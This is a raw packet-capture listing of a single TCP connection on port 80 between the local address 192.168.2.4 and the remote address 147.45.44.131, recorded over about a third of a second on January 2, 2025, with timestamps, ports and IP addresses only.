Jan 2, 2025 19:13:03.636579990 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636590958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636600971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636610031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.636616945 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.636632919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.636653900 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728405952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728420973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728431940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728452921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728487015 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728498936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728508949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728519917 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728530884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728533030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728539944 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728549957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728562117 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728600025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728600025 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.728801966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728949070 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728960037 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728970051 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728980064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728990078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.728991985 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729000092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729011059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729020119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729029894 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729043007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729043007 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729090929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729868889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729880095 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729890108 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729899883 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729909897 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729918957 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729929924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729938984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729948997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729958057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.729990959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729990959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.729990959 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.730077028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.730766058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730777025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730786085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730797052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730806112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730818987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730828047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730829954 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.730838060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730848074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730859041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.730866909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.730866909 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.731033087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.731532097 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.731543064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.731569052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.731579065 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.731590033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.731604099 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.731647015 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812374115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812442064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812443018 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812458992 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812469959 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812482119 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812524080 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812529087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812535048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812568903 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812587976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812623978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812690020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812695980 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812706947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812755108 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812782049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812793016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812803030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812813044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812824011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.812824965 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.812861919 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813178062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813193083 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813204050 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813214064 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813230038 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813254118 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813381910 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813450098 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813467979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813478947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813488960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813504934 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813514948 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813524008 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813524961 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813535929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813545942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.813554049 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.813589096 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814017057 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814027071 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814037085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814052105 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814064026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814073086 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814083099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814095020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814095020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814100981 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814110994 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814121962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814131975 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814142942 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814150095 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814150095 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814160109 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814169884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814176083 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.814181089 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.814227104 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815095901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815107107 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815116882 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815126896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815136909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815146923 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815159082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815169096 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815179110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815180063 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815180063 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815188885 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815200090 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815211058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815220118 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815231085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815233946 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815233946 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815242052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.815267086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.815293074 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816060066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816071033 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816081047 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816091061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816101074 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816109896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816112995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816122055 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816132069 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816142082 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816147089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816147089 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816153049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816164017 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816174030 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816174984 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816184044 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816195011 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816200972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816200972 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816205978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816236973 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.816831112 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.816910028 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817029953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817040920 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817051888 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817060947 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817071915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817081928 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817092896 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817099094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817099094 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817102909 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817114115 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817116976 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817122936 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817133904 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817162037 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817162037 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817162991 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817173958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817184925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817212105 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817235947 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.817783117 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817795038 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.817949057 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901029110 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901041031 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901051998 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901077032 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901091099 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901102066 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901113987 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901146889 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901146889 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901268005 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901278973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901289940 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901299953 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901330948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901330948 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901515007 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901525021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901535034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901545048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901567936 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901577950 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901725054 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901736021 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901746988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901757002 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901787043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901787043 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.901895046 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901911974 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901921988 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.901972055 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902044058 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902101040 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902189016 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902199984 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902209997 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902221918 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902231932 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902240992 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902246952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902252913 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902259111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902272940 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902348995 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902611971 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902623892 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902642965 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902652979 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902658939 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902663946 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902673960 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902683973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902721882 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902736902 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902745962 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902756929 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902766943 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902775049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.902810097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.902810097 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903280973 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903297901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903307915 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903323889 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903332949 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903337955 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903343916 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903373003 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903373003 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903649092 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903660059 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903671026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903681040 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903696060 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903702974 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903707027 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903716087 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903717041 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903728008 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903738022 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903740883 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903748035 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903760910 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903795004 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903795004 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903806925 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903815985 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903826952 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903839111 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.903850079 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903861046 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.903877020 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904578924 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904589891 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904599905 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904618025 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904627085 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904635906 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904638052 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904655933 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904666901 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904676914 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904681921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904681921 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904695034 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904705048 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904711962 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904715061 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904741049 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904751062 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904759884 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.904762030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904762030 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.904795885 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905605078 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905616045 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905627012 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905637026 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905647039 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905657053 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905668020 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905678034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905678034 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905705929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905705929 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905766964 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905776978 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905787945 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905797958 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905807972 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905818939 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905827999 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905832052 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905838966 CET	80	49731	147.45.44.131	192.168.2.4
Jan 2, 2025 19:13:03.905857086 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.905889988 CET	49731	80	192.168.2.4	147.45.44.131
Jan 2, 2025 19:13:03.906708956 CET	80	49731	147.45.44.131	192.168.2.4
